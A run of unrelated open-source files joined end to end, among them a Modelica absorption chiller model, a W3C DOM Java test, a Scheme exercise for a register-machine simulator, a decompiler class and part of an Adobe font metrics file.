connect(on, perMod.on) annotation (Line(points={{-114,16},{-94,16},{-94,17},{
-53,17}},
color={255,0,255}));
connect(perMod.QCon_flow, preHeaFloCon.Q_flow) annotation (Line(points={{-31,18},
{-20,18},{-20,28},{-52,28},{-52,40},{-47,40}}, color={0,0,127}));
connect(perMod.QEva_flow, preHeaFloEva.Q_flow) annotation (Line(points={{-31,8},
{-20,8},{-20,-30},{-1,-30}}, color={0,0,127}));
connect(preHeaFloEva.port, vol2.heatPort)
annotation (Line(points={{19,-30},{28,-30},{28,-60},{12,-60}},
color={191,0,0}));
connect(perMod.QEva_flow, QEva_flow) annotation (Line(points={{-31,8},{88,8},
{88,-40},{110,-40}}, color={0,0,127}));
connect(TConEnt.y, perMod.TConEnt) annotation (Line(points={{-71,1},{-66,1},{
-66,13},{-53,13}}, color={0,0,127}));
connect(QEva_flow_set.y, perMod.QEva_flow_set) annotation (Line(points={{-71,-18},
{-64,-18},{-64,7},{-53,7}}, color={0,0,127}));
connect(preHeaFloCon.port, vol1.heatPort) annotation (Line(points={{-27,40},{-20,
40},{-20,60},{-10,60}}, color={
191,0,0}));
connect(perMod.QCon_flow, QCon_flow) annotation (Line(points={{-31,18},{86,18},
{86,40},{110,40}}, color={0,0,127}));
connect(perMod.QGen_flow, QGen_flow) annotation (Line(points={{-31,12},{92,12},
{92,-20},{110,-20}},color={0,0,127}));
connect(TEvaLvg.port, vol2.heatPort) annotation (Line(points={{-32,-40},{28,
-40},{28,-60},{12,-60}},
color={191,0,0}));
connect(TEvaLvg.T, perMod.TEvaLvg) annotation (Line(points={{-52,-40},{-60,
-40},{-60,3},{-53,3}}, color={0,0,127}));
connect(perMod.P, P) annotation (Line(points={{-31,15},{94,15},{94,20},{110,
20}}, color={0,0,127}));
annotation (Icon(graphics={
Line(points={{-40,76}}, color={238,46,47}),
Line(
points={{-100,-20},{-82,-20},{-82,-60}},
color={0,0,127},
thickness=0.5),
Rectangle(
extent={{-56,68},{58,50}},
lineColor={0,0,0},
fillColor={255,255,255},
fillPattern=FillPattern.Solid),
Rectangle(
extent={{-56,-52},{58,-70}},
lineColor={0,0,0},
fillColor={255,255,255},
fillPattern=FillPattern.Solid),
Rectangle(
extent={{-103,64},{98,54}},
lineColor={0,0,255},
pattern=LinePattern.None,
fillColor={0,0,255},
fillPattern=FillPattern.Solid),
Rectangle(
extent={{-2,54},{98,64}},
lineColor={0,0,255},
pattern=LinePattern.None,
fillColor={255,0,0},
fillPattern=FillPattern.Solid),
Rectangle(
extent={{-101,-56},{100,-66}},
lineColor={0,0,255},
pattern=LinePattern.None,
fillColor={0,0,255},
fillPattern=FillPattern.Solid),
Rectangle(
extent={{-100,-66},{0,-56}},
lineColor={0,0,127},
pattern=LinePattern.None,
fillColor={0,0,127},
fillPattern=FillPattern.Solid),
Polygon(
points={{-42,0},{-52,-12},{-32,-12},{-42,0}},
lineColor={0,0,0},
smooth=Smooth.None,
fillColor={255,255,255},
fillPattern=FillPattern.Solid),
Polygon(
points={{-42,0},{-52,10},{-32,10},{-42,0}},
lineColor={0,0,0},
smooth=Smooth.None,
fillColor={255,255,255},
fillPattern=FillPattern.Solid),
Rectangle(
extent={{-44,50},{-40,10}},
lineColor={0,0,0},
fillColor={255,255,255},
fillPattern=FillPattern.Solid),
Rectangle(
extent={{-44,-12},{-40,-52}},
lineColor={0,0,0},
fillColor={255,255,255},
fillPattern=FillPattern.Solid),
Rectangle(
extent={{38,50},{42,-52}},
lineColor={0,0,0},
fillColor={255,255,255},
fillPattern=FillPattern.Solid),
Ellipse(
extent={{24,16},{56,-16}},
lineColor={0,0,0},
fillColor={255,255,255},
fillPattern=FillPattern.Solid),
Polygon(
points={{40,16},{24,0},{56,0},{40,16}},
lineColor={0,0,0},
fillColor={0,0,0},
fillPattern=FillPattern.Solid)}),
defaultComponentName="chi",
Documentation(info="<html>
<p>
Model for an indirect steam heated absorption chiller based on performance curves.
The model uses performance curves similar to the EnergyPlus model <code>Chiller:Absorption:Indirect</code>.
</p>
<p>
The model uses six functions to predict the chiller cooling capacity, power consumption for
the chiller pump and the generator heat flow rate and the condenser heat flow.
These functions use the performance data stored in the record <code>per</code>.
The computations are as follows:
</p>
<p>
The capacity function of the evaporator is
<p align=\"center\" style=\"font-style:italic;\">
capFun<sub>eva</sub> = A<sub>1</sub> + A<sub>2</sub> T<sub>eva,lvg</sub> +
A<sub>3</sub> T<sup>2</sup><sub>eva,lvg</sub> + A<sub>4</sub> T<sup>3</sup><sub>eva,lvg</sub>.
</p>
<p>
The capacity function of the condenser is
<p align=\"center\" style=\"font-style:italic;\">
capFun<sub>con</sub> = B<sub>1</sub> + B<sub>2</sub> T<sub>con,ent</sub> +
B<sub>3</sub> T<sup>2</sup><sub>con,ent</sub> + B<sub>4</sub> T<sup>3</sup><sub>con,ent</sub>.
</p>
<p>
These capacity functions are used to compute the available cooling capacity of the evaporator as
<p align=\"center\" style=\"font-style:italic;\">
Q̇<sub>eva,ava</sub> = capFun<sub>eva</sub> capFun<sub>con</sub> Q̇<sub>eva,0</sub>,
</p>
<p>
where <i>Q̇<sub>eva,0</sub></i> is obtained from the performance data <code>per.QEva_flow_nominal</code>.
Let <i>Q̇<sub>eva,set</sub></i> denote the heat required to meet the set point <code>TSet</code>.
Then, the model computes the part load ratio as
<p align=\"center\" style=\"font-style:italic;\">
PLR =min(Q̇<sub>eva,set</sub>/Q̇<sub>eva,ava</sub>, PLR<sub>max</sub>).
</p>
<p>
Hence, the model ensures that the chiller capacity does not exceed the chiller capacity specified
by the parameter <code>per.PLRMax</code>.
The cycling ratio is computed as
<p align=\"center\" style=\"font-style:italic;\">
CR = min(PLR/PLR<sub>min</sub>, 1.0),
</p>
<p>
where <i>PRL<sub>min</sub></i> is obtained from the performance record <code>per.PLRMin</code>.
This ratio expresses the fraction of time
that a chiller would run if it were to cycle because its load is smaller than the
minimal load at which it can operate.
Note that this model continuously operates even if the part load ratio is below the
minimum part load ratio.
Its leaving evaporator and condenser temperature can therefore be considered as an
average temperature between the modes when the compressor is off and on.
</p>
<p>
Using the part load ratio, the energy input ratio of the chiller pump is
<p align=\"center\" style=\"font-style:italic;\">
EIRP = C<sub>1</sub> + C<sub>2</sub>PLR+C<sub>3</sub>PLR<sup>2</sup>.
</p>
<p>
The generator heat input ratio is
<p align=\"center\" style=\"font-style:italic;\">
genHIR = D<sub>1</sub> + D<sub>2</sub>PLR+D<sub>3</sub>PLR<sup>2</sup>+D<sub>4</sub>PLR<sup>3</sup>.
</p>
<p>
Two additional curves modifiy the heat input requirement based on the condenser inlet water temperature
and the evaporator outlet water temperature. Specifically,
the generator heat modifier based on the condenser inlet water temperature is
<p align=\"center\" style=\"font-style:italic;\">
genT<sub>con</sub> = E<sub>1</sub> + E<sub>2</sub> T<sub>con,ent</sub> +
E<sub>3</sub> T<sup>2</sup><sub>con,ent</sub> + E<sub>4</sub> T<sup>3</sup><sub>con,ent</sub>,
</p>
<p>
and the generator heat modifier based on the evaporator inlet water temperature is
<p align=\"center\" style=\"font-style:italic;\">
genT<sub>eva</sub>= F<sub>1</sub> + F<sub>2</sub> T<sub>eva,lvg</sub> +
F<sub>3</sub> T<sup>2</sup><sub>eva,lvg</sub> + F<sub>4</sub> T<sup>3</sup><sub>eva,lvg</sub>.
</p>
<p>
The main outputs of the model that are to be used in energy analysis
are the required generator heat <code>QGen_flow</code> and
the electric power consumption of the chiller pump <code>P</code>.
For example, if the chiller were to be regenerated with steam, then
<code>QGen_flow</code> is the heat that must be provided by a steam loop.
This model computes the required generator heat as
<p align=\"center\" style=\"font-style:italic;\">
Q̇<sub>gen</sub> = -Q̇<sub>eva,ava</sub> genHIR genT<sub>con</sub> genT<sub>eva</sub> CR.
</p>
<p>
The pump power consumption is
<p align=\"center\" style=\"font-style:italic;\">
P = EIRP CR P<sub>0</sub>,
</p>
<p>
where <i>P<sub>0</sub></i> is the pump nominal power obtained from the performance data <code>per.P_nominal</code>.
The heat balance of the chiller is
<p align=\"center\" style=\"font-style:italic;\">
Q̇<sub>con</sub> = -Q̇<sub>eva</sub> + Q̇<sub>gen</sub> + P.
</p>
<h4>Performance data</h4>
<p>
The equipment performance data is obtained from the record <code>per</code>,
which is an instance of
<a href=\"Buildings.Fluid.Chillers.Data.AbsorptionIndirectSteam\">
Buildings.Fluid.Chillers.Data.AbsorptionIndirectSteam</a>.
Additional performance curves can be developed using
two available techniques (Hydeman and Gillespie, 2002). The first technique is called the
Least-squares Linear Regression method and is used when sufficient performance data exist
to employ standard least-square linear regression techniques. The second technique is called
Reference Curve Method and is used when insufficient performance data exist to apply linear
regression techniques. A detailed description of both techniques can be found in
Hydeman and Gillespie (2002).
</p>
<h4>References</h4>
<ul>
<li>
Hydeman, M. and K.L. Gillespie. 2002. Tools and Techniques to Calibrate Electric Chiller
Component Models. <i>ASHRAE Transactions</i>, AC-02-9-1.
</li>
</ul>
</html>", revisions="<html>
<ul>
<li>
November 26, 2019, by Michael Wetter:<br/>
Revised implementation and documentation.
</li>
<li>
July 3, 2019, by Hagar Elarga:<br/>
First implementation.
</li>
</ul>
</html>"));
end AbsorptionIndirectSteam;
| {
"pile_set_name": "Github"
} |
/*
This Java source file was generated by test-to-java.xsl
and is a derived work from the source document.
The source document contained the following notice:
Copyright (c) 2001 World Wide Web Consortium,
(Massachusetts Institute of Technology, Institut National de
Recherche en Informatique et en Automatique, Keio University). All
Rights Reserved. This program is distributed under the W3C's Software
Intellectual Property License. This program is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE.
See W3C License http://www.w3.org/Consortium/Legal/ for more details.
*/
package org.w3c.domts.level2.core;
import org.w3c.dom.*;
import org.w3c.domts.DOMTestCase;
import org.w3c.domts.DOMTestDocumentBuilderFactory;
/**
* The "importNode(importedNode,deep)" method for a
* Document should import the given importedNode into that Document.
* The importedNode is of type Document_Fragment.
*
* Create a DocumentFragment in a different document.
* Invoke method importNode(importedNode,deep) on this document
* with importedNode being the newly created DocumentFragment.
* Method should return an empty DocumentFragment that belongs
* to this document whose systemId is "staff.dtd"
* @author NIST
* @author Mary Brady
* @see <a href="http://www.w3.org/TR/DOM-Level-2-Core/core#Core-Document-importNode">http://www.w3.org/TR/DOM-Level-2-Core/core#Core-Document-importNode</a>
* @see <a href="http://www.w3.org/TR/DOM-Level-2-Core/core#ID-Core-DocType-systemId">http://www.w3.org/TR/DOM-Level-2-Core/core#ID-Core-DocType-systemId</a>
*/
public final class importNode08 extends DOMTestCase {
/**
* Constructor.
* @param factory document factory, may not be null
* @throws org.w3c.domts.DOMTestIncompatibleException Thrown if test is not compatible with parser configuration
*/
public importNode08(final DOMTestDocumentBuilderFactory factory) throws org.w3c.domts.DOMTestIncompatibleException {
super(factory);
//
// check if loaded documents are supported for content type
//
String contentType = getContentType();
preload(contentType, "staffNS", true);
preload(contentType, "staffNS", true);
}
/**
* Runs the test case.
* @throws Throwable Any uncaught exception causes test to fail
*/
public void runTest() throws Throwable {
Document doc;
Document aNewDoc;
DocumentFragment docFrag;
Node aNode;
boolean hasChild;
Document ownerDocument;
DocumentType docType;
String system;
doc = (Document) load("staffNS", true);
aNewDoc = (Document) load("staffNS", true);
docFrag = aNewDoc.createDocumentFragment();
aNode = doc.importNode(docFrag, false);
hasChild = aNode.hasChildNodes();
assertFalse("hasChild", hasChild);
ownerDocument = aNode.getOwnerDocument();
docType = ownerDocument.getDoctype();
system = docType.getSystemId();
assertURIEquals("system", null, null, null, "staffNS.dtd", null, null, null, null, system);
}
/**
* Gets URI that identifies the test.
* @return uri identifier of test
*/
public String getTargetURI() {
return "http://www.w3.org/2001/DOM-Test-Suite/level2/core/importNode08";
}
/**
* Runs this test from the command line.
* @param args command line arguments
*/
public static void main(final String[] args) {
DOMTestCase.doMain(importNode08.class, args);
}
}
| {
"pile_set_name": "Github"
} |
function varargout = override(varargin)
% VL_OVERRIDE Override structure subset
% CONFIG = VL_OVERRIDE(CONFIG, UPDATE) copies recursively the fileds
% of the structure UPDATE to the corresponding fields of the
% struture CONFIG.
%
% Usually CONFIG is interpreted as a list of paramters with their
% default values and UPDATE as a list of new paramete values.
%
% VL_OVERRIDE(..., 'Warn') prints a warning message whenever: (i)
% UPDATE has a field not found in CONFIG, or (ii) non-leaf values of
% CONFIG are overwritten.
%
% VL_OVERRIDE(..., 'Skip') skips fields of UPDATE that are not found
% in CONFIG instead of copying them.
%
% VL_OVERRIDE(..., 'CaseI') matches field names in a
% case-insensitive manner.
%
% Remark::
% Fields are copied at the deepest possible level. For instance,
% if CONFIG has fields A.B.C1=1 and A.B.C2=2, and if UPDATE is the
% structure A.B.C1=3, then VL_OVERRIDE() returns a strucuture with
% fields A.B.C1=3, A.B.C2=2. By contrast, if UPDATE is the
% structure A.B=4, then the field A.B is copied, and VL_OVERRIDE()
% returns the structure A.B=4 (specifying 'Warn' would warn about
% the fact that the substructure B.C1, B.C2 is being deleted).
%
% Remark::
% Two fields are matched if they correspond exactly. Specifically,
% two fileds A(IA).(FA) and B(IA).FB of two struct arrays A and B
% match if, and only if, (i) A and B have the same dimensions,
% (ii) IA == IB, and (iii) FA == FB.
%
% See also: VL_ARGPARSE(), VL_HELP().
[varargout{1:nargout}] = vl_override(varargin{:});
| {
"pile_set_name": "Github"
} |
"""distutils.command.x
Implements the Distutils 'x' command.
"""
# created 2000/mm/dd, John Doe
__revision__ = "$Id$"
from distutils.core import Command
class x(Command):
# Brief (40-50 characters) description of the command
description = ""
# List of option tuples: long name, short name (None if no short
# name), and help string.
user_options = [('', '',
""),
]
def initialize_options(self):
self. = None
self. = None
self. = None
def finalize_options(self):
if self.x is None:
self.x =
def run(self):
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: eec785c5f1463f746a6ded89f150f845
timeCreated: 1501397127
licenseType: Store
MonoImporter:
serializedVersion: 2
defaultReferences: []
executionOrder: 0
icon: {instanceID: 0}
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
; SICP exercise 5.12
;
; The simulator can be used to help determine the data paths required for
; implementing a machine with a given controller. Extend the assembler to
; store the following information in the machine model:
;
; * a list of all instructions, with duplicates removed, sorted by instruction
; type (assign, goto, and so on);
; * a list (without duplicates) of the registers used to hold entry points
; (these are the registers referenced by goto instructions);
; * a list (without duplicates) of the registers that are saved or restored;
; * for each register, a list (without duplicates) of the sources from which
; it is assigned (for example, the sources for register val in the factorial
; of figure 5.11 are (const 1) and ((op *) (reg n) (reg val))).
;
; Extend the message-passing interface to the machine to provide access to
; this new information. To test your analyzer, define the Fibonacci machine
; from figure 5.12 and examine the lists you constructed.
(define (extract-data-path-info controller-text)
(list (list 'instructions (data-path-instructions controller-text))
(list 'entry-point-registers (data-path-entry-point-registers controller-text))
(list 'stack-registers (data-path-stack-registers controller-text))
(list 'register-sources (data-path-register-sources controller-text))))
(define (data-path-instructions controller-text)
(process-text controller-text
(lambda (inst) #t)
(lambda (inst) inst)))
(define (data-path-entry-point-registers controller-text)
(process-text controller-text
(lambda (inst) (and (eq? (car inst) 'goto)
(register-exp? (goto-dest inst))))
(compose goto-dest register-exp-reg)))
(define (data-path-stack-registers controller-text)
(process-text controller-text
(lambda (inst) (or (eq? (car inst) 'save)
(eq? (car inst) 'restore)))
stack-inst-reg-name))
(define (data-path-register-sources controller-text)
(define (to-alist items result)
(cond ((null? items) (list result))
((null? result)
(to-alist (cdr items) (car items)))
((eq? (caar items) (car result))
(to-alist (cdr items) (cons (car result)
(append (cdr result)
(list (cadar items))))))
(else (cons result (to-alist items '())))))
(to-alist
(process-text controller-text
(lambda (inst) (eq? (car inst) 'assign))
(lambda (inst) (list (assign-reg-name inst)
(if (operation-exp? (assign-value-exp inst))
(assign-value-exp inst)
(car (assign-value-exp inst))))))
'()))
(define (process-text controller-text predicate proc)
(sort (remove-duplicates (map proc
(filter predicate
(filter pair?
controller-text))))
string<?
#:key (lambda (inst) (format "~a" inst))
#:cache-keys? #f))
; Tweaks for make-machine and make-new-machine:
(define (make-machine register-names ops controller-text)
(let ((machine (make-new-machine)))
(for-each (lambda (register-name)
((machine 'allocate-register) register-name))
register-names)
((machine 'install-operations) ops)
((machine 'install-instruction-sequence)
(assemble controller-text machine))
((machine 'install-data-path-info)
(extract-data-path-info controller-text))
machine))
(define (make-new-machine)
(let ((pc (make-register 'pc))
(flag (make-register 'flag))
(stack (make-stack))
(the-instruction-sequence '())
(data-path-info '()))
(let ((the-ops (list (list 'initialize-stack
(lambda () (stack 'initialize)))))
(register-table (list (list 'pc pc) (list 'flag flag))))
(define (allocate-register name)
(if (assoc name register-table)
(error "Multiply defined register: " name)
(set! register-table (cons (list name (make-register name))
register-table)))
'register-allocated)
(define (lookup-register name)
(let ((val (assoc name register-table)))
(if val
(cadr val)
(error "Unknown register: " name))))
(define (execute)
(let ((insts (get-contents pc)))
(if (null? insts)
'done
(begin
((instruction-execution-proc (car insts)))
(execute)))))
(define (dispatch message)
(cond ((eq? message 'start)
(set-contents! pc the-instruction-sequence)
(execute))
((eq? message 'install-instruction-sequence)
(lambda (seq) (set! the-instruction-sequence seq)))
((eq? message 'allocate-register) allocate-register)
((eq? message 'get-register) lookup-register)
((eq? message 'install-operations)
(lambda (ops) (set! the-ops (append the-ops ops))))
((eq? message 'stack) stack)
((eq? message 'operations) the-ops)
((eq? message 'install-data-path-info)
(lambda (info) (set! data-path-info info)))
((eq? message 'data-path-instructions)
(cadr (assoc 'instructions data-path-info)))
((eq? message 'data-path-entry-point-registers)
(cadr (assoc 'entry-point-registers data-path-info)))
((eq? message 'data-path-stack-registers)
(cadr (assoc 'stack-registers data-path-info)))
((eq? message 'data-path-register-sources)
(cadr (assoc 'register-sources data-path-info)))
(else (error "Unknown request -- MACHINE" message))))
dispatch)))
| {
"pile_set_name": "Github"
} |
{
"id": "overlay_male_worn_scarf",
"fg": ["scarf_m"],
"bg": []
}
| {
"pile_set_name": "Github"
} |
import re
import sys
# Write the config.c file
never = ['marshal', '__main__', '__builtin__', 'sys', 'exceptions', '_warnings']
def makeconfig(infp, outfp, modules, with_ifdef=0):
m1 = re.compile('-- ADDMODULE MARKER 1 --')
m2 = re.compile('-- ADDMODULE MARKER 2 --')
while 1:
line = infp.readline()
if not line: break
outfp.write(line)
if m1 and m1.search(line):
m1 = None
for mod in modules:
if mod in never:
continue
if with_ifdef:
outfp.write("#ifndef init%s\n"%mod)
outfp.write('extern void init%s(void);\n' % mod)
if with_ifdef:
outfp.write("#endif\n")
elif m2 and m2.search(line):
m2 = None
for mod in modules:
if mod in never:
continue
outfp.write('\t{"%s", init%s},\n' %
(mod, mod))
if m1:
sys.stderr.write('MARKER 1 never found\n')
elif m2:
sys.stderr.write('MARKER 2 never found\n')
# Test program.
def test():
if not sys.argv[3:]:
print 'usage: python makeconfig.py config.c.in outputfile',
print 'modulename ...'
sys.exit(2)
if sys.argv[1] == '-':
infp = sys.stdin
else:
infp = open(sys.argv[1])
if sys.argv[2] == '-':
outfp = sys.stdout
else:
outfp = open(sys.argv[2], 'w')
makeconfig(infp, outfp, sys.argv[3:])
if outfp != sys.stdout:
outfp.close()
if infp != sys.stdin:
infp.close()
if __name__ == '__main__':
test()
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2000-2016 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jetbrains.java.decompiler.modules.decompiler.exps;
import org.jetbrains.java.decompiler.main.DecompilerContext;
import org.jetbrains.java.decompiler.main.TextBuffer;
import org.jetbrains.java.decompiler.main.collectors.BytecodeMappingTracer;
import org.jetbrains.java.decompiler.main.collectors.CounterContainer;
import org.jetbrains.java.decompiler.modules.decompiler.vars.CheckTypesResult;
import org.jetbrains.java.decompiler.modules.decompiler.vars.VarVersionPair;
import org.jetbrains.java.decompiler.struct.gen.VarType;
import org.jetbrains.java.decompiler.struct.match.IMatchable;
import org.jetbrains.java.decompiler.struct.match.MatchEngine;
import org.jetbrains.java.decompiler.struct.match.MatchNode;
import org.jetbrains.java.decompiler.struct.match.MatchNode.RuleValue;
import java.util.*;
import java.util.Map.Entry;
public class Exprent implements IMatchable {
public static final int MULTIPLE_USES = 1;
public static final int SIDE_EFFECTS_FREE = 2;
public static final int BOTH_FLAGS = 3;
public static final int EXPRENT_ARRAY = 1;
public static final int EXPRENT_ASSIGNMENT = 2;
public static final int EXPRENT_CONST = 3;
public static final int EXPRENT_EXIT = 4;
public static final int EXPRENT_FIELD = 5;
public static final int EXPRENT_FUNCTION = 6;
public static final int EXPRENT_IF = 7;
public static final int EXPRENT_INVOCATION = 8;
public static final int EXPRENT_MONITOR = 9;
public static final int EXPRENT_NEW = 10;
public static final int EXPRENT_SWITCH = 11;
public static final int EXPRENT_VAR = 12;
public static final int EXPRENT_ANNOTATION = 13;
public static final int EXPRENT_ASSERT = 14;
public final int type;
public final int id;
public Set<Integer> bytecode = null; // offsets of bytecode instructions decompiled to this exprent
public Exprent(int type) {
this.type = type;
this.id = DecompilerContext.getCounterContainer().getCounterAndIncrement(CounterContainer.EXPRENT_COUNTER);
}
public int getPrecedence() {
return 0; // the highest precedence
}
public VarType getExprType() {
return VarType.VARTYPE_VOID;
}
public int getExprentUse() {
return 0;
}
public CheckTypesResult checkExprTypeBounds() {
return new CheckTypesResult();
}
public boolean containsExprent(Exprent exprent) {
List<Exprent> listTemp = new ArrayList<Exprent>(getAllExprents(true));
listTemp.add(this);
for (Exprent lstExpr : listTemp) {
if (lstExpr.equals(exprent)) {
return true;
}
}
return false;
}
public List<Exprent> getAllExprents(boolean recursive) {
List<Exprent> lst = getAllExprents();
if (recursive) {
for (int i = lst.size() - 1; i >= 0; i--) {
lst.addAll(lst.get(i).getAllExprents(true));
}
}
return lst;
}
public Set<VarVersionPair> getAllVariables() {
List<Exprent> lstAllExprents = getAllExprents(true);
lstAllExprents.add(this);
Set<VarVersionPair> set = new HashSet<VarVersionPair>();
for (Exprent expr : lstAllExprents) {
if (expr.type == EXPRENT_VAR) {
set.add(new VarVersionPair((VarExprent)expr));
}
}
return set;
}
public List<Exprent> getAllExprents() {
throw new RuntimeException("not implemented");
}
public Exprent copy() {
throw new RuntimeException("not implemented");
}
public TextBuffer toJava(int indent, BytecodeMappingTracer tracer) {
throw new RuntimeException("not implemented");
}
public void replaceExprent(Exprent oldExpr, Exprent newExpr) { }
public void addBytecodeOffsets(Collection<Integer> bytecodeOffsets) {
if (bytecodeOffsets != null && !bytecodeOffsets.isEmpty()) {
if (bytecode == null) {
bytecode = new HashSet<Integer>(bytecodeOffsets);
}
else {
bytecode.addAll(bytecodeOffsets);
}
}
}
// *****************************************************************************
// IMatchable implementation
// *****************************************************************************
public IMatchable findObject(MatchNode matchNode, int index) {
if (matchNode.getType() != MatchNode.MATCHNODE_EXPRENT) {
return null;
}
List<Exprent> lstAllExprents = getAllExprents();
if (lstAllExprents == null || lstAllExprents.isEmpty()) {
return null;
}
String position = (String)matchNode.getRuleValue(MatchProperties.EXPRENT_POSITION);
if (position != null) {
if (position.matches("-?\\d+")) {
return lstAllExprents
.get((lstAllExprents.size() + Integer.parseInt(position)) % lstAllExprents.size()); // care for negative positions
}
}
else if (index < lstAllExprents.size()) { // use 'index' parameter
return lstAllExprents.get(index);
}
return null;
}
public boolean match(MatchNode matchNode, MatchEngine engine) {
if (matchNode.getType() != MatchNode.MATCHNODE_EXPRENT) {
return false;
}
for (Entry<MatchProperties, RuleValue> rule : matchNode.getRules().entrySet()) {
MatchProperties key = rule.getKey();
if (key == MatchProperties.EXPRENT_TYPE && this.type != ((Integer)rule.getValue().value).intValue()) {
return false;
}
if (key == MatchProperties.EXPRENT_RET && !engine.checkAndSetVariableValue((String)rule.getValue().value, this)) {
return false;
}
}
return true;
}
public String toString() {
return toJava(0, BytecodeMappingTracer.DUMMY).toString();
}
} | {
"pile_set_name": "Github"
} |
StartFontMetrics 2.0
Comment Copyright (c) 1985, 1987, 1989, 1991 Adobe Systems Incorporated. All Rights Reserved.
Comment Creation Date: Tue May 28 16:56:07 1991
Comment UniqueID 35034
Comment VMusage 31030 37922
FontName NewCenturySchlbk-BoldItalic
FullName New Century Schoolbook Bold Italic
FamilyName New Century Schoolbook
Weight Bold
ItalicAngle -16
IsFixedPitch false
FontBBox -205 -250 1147 991
UnderlinePosition -100
UnderlineThickness 50
Version 001.007
Notice Copyright (c) 1985, 1987, 1989, 1991 Adobe Systems Incorporated. All Rights Reserved.
EncodingScheme AdobeStandardEncoding
CapHeight 722
XHeight 477
Ascender 737
Descender -205
StartCharMetrics 228
C 32 ; WX 287 ; N space ; B 0 0 0 0 ;
C 33 ; WX 333 ; N exclam ; B 0 -15 333 737 ;
C 34 ; WX 400 ; N quotedbl ; B 66 388 428 737 ;
C 35 ; WX 574 ; N numbersign ; B 30 0 544 690 ;
C 36 ; WX 574 ; N dollar ; B 9 -120 565 810 ;
C 37 ; WX 889 ; N percent ; B 54 -28 835 727 ;
C 38 ; WX 889 ; N ampersand ; B 32 -15 823 737 ;
C 39 ; WX 259 ; N quoteright ; B 48 388 275 737 ;
C 40 ; WX 407 ; N parenleft ; B 72 -117 454 745 ;
C 41 ; WX 407 ; N parenright ; B -70 -117 310 745 ;
C 42 ; WX 500 ; N asterisk ; B 58 301 498 737 ;
C 43 ; WX 606 ; N plus ; B 50 0 556 506 ;
C 44 ; WX 287 ; N comma ; B -57 -192 170 157 ;
C 45 ; WX 333 ; N hyphen ; B 2 177 263 299 ;
C 46 ; WX 287 ; N period ; B -20 -15 152 157 ;
C 47 ; WX 278 ; N slash ; B -41 -15 320 737 ;
C 48 ; WX 574 ; N zero ; B 21 -15 553 705 ;
C 49 ; WX 574 ; N one ; B 25 0 489 705 ;
C 50 ; WX 574 ; N two ; B -38 -3 538 705 ;
C 51 ; WX 574 ; N three ; B -7 -15 536 705 ;
C 52 ; WX 574 ; N four ; B -13 0 544 705 ;
C 53 ; WX 574 ; N five ; B 0 -15 574 705 ;
C 54 ; WX 574 ; N six ; B 31 -15 574 705 ;
C 55 ; WX 574 ; N seven ; B 64 -15 593 705 ;
C 56 ; WX 574 ; N eight ; B 0 -15 552 705 ;
C 57 ; WX 574 ; N nine ; B 0 -15 543 705 ;
C 58 ; WX 287 ; N colon ; B -20 -15 237 477 ;
C 59 ; WX 287 ; N semicolon ; B -57 -192 237 477 ;
C 60 ; WX 606 ; N less ; B 50 -9 556 515 ;
C 61 ; WX 606 ; N equal ; B 50 103 556 403 ;
C 62 ; WX 606 ; N greater ; B 50 -8 556 514 ;
C 63 ; WX 481 ; N question ; B 79 -15 451 737 ;
C 64 ; WX 747 ; N at ; B -4 -15 751 737 ;
C 65 ; WX 741 ; N A ; B -75 0 716 737 ;
C 66 ; WX 759 ; N B ; B -50 0 721 722 ;
C 67 ; WX 759 ; N C ; B 37 -15 759 737 ;
C 68 ; WX 833 ; N D ; B -47 0 796 722 ;
C 69 ; WX 741 ; N E ; B -41 0 730 722 ;
C 70 ; WX 704 ; N F ; B -41 0 730 722 ;
C 71 ; WX 815 ; N G ; B 37 -15 805 737 ;
C 72 ; WX 870 ; N H ; B -41 0 911 722 ;
C 73 ; WX 444 ; N I ; B -41 0 485 722 ;
C 74 ; WX 667 ; N J ; B -20 -15 708 722 ;
C 75 ; WX 778 ; N K ; B -41 0 832 722 ;
C 76 ; WX 704 ; N L ; B -41 0 670 722 ;
C 77 ; WX 944 ; N M ; B -44 0 988 722 ;
C 78 ; WX 852 ; N N ; B -61 -10 913 722 ;
C 79 ; WX 833 ; N O ; B 37 -15 796 737 ;
C 80 ; WX 741 ; N P ; B -41 0 730 722 ;
C 81 ; WX 833 ; N Q ; B 37 -189 796 737 ;
C 82 ; WX 796 ; N R ; B -41 -15 749 722 ;
C 83 ; WX 685 ; N S ; B 1 -15 666 737 ;
C 84 ; WX 722 ; N T ; B 41 0 759 722 ;
C 85 ; WX 833 ; N U ; B 88 -15 900 722 ;
C 86 ; WX 741 ; N V ; B 32 -10 802 722 ;
C 87 ; WX 944 ; N W ; B 40 -10 1000 722 ;
C 88 ; WX 741 ; N X ; B -82 0 801 722 ;
C 89 ; WX 704 ; N Y ; B 13 0 775 722 ;
C 90 ; WX 704 ; N Z ; B -33 0 711 722 ;
C 91 ; WX 407 ; N bracketleft ; B 1 -109 464 737 ;
C 92 ; WX 606 ; N backslash ; B 161 -15 445 737 ;
C 93 ; WX 407 ; N bracketright ; B -101 -109 362 737 ;
C 94 ; WX 606 ; N asciicircum ; B 66 325 540 690 ;
C 95 ; WX 500 ; N underscore ; B 0 -125 500 -75 ;
C 96 ; WX 259 ; N quoteleft ; B 47 388 274 737 ;
C 97 ; WX 667 ; N a ; B 6 -15 636 477 ;
C 98 ; WX 611 ; N b ; B 29 -15 557 737 ;
C 99 ; WX 537 ; N c ; B 0 -15 482 477 ;
C 100 ; WX 667 ; N d ; B 0 -15 660 737 ;
C 101 ; WX 519 ; N e ; B 0 -15 479 477 ;
C 102 ; WX 389 ; N f ; B -48 -205 550 737 ; L i fi ; L l fl ;
C 103 ; WX 611 ; N g ; B -63 -205 604 528 ;
C 104 ; WX 685 ; N h ; B 0 -15 639 737 ;
C 105 ; WX 389 ; N i ; B 32 -15 345 737 ;
C 106 ; WX 370 ; N j ; B -205 -205 347 737 ;
C 107 ; WX 648 ; N k ; B -11 -15 578 737 ;
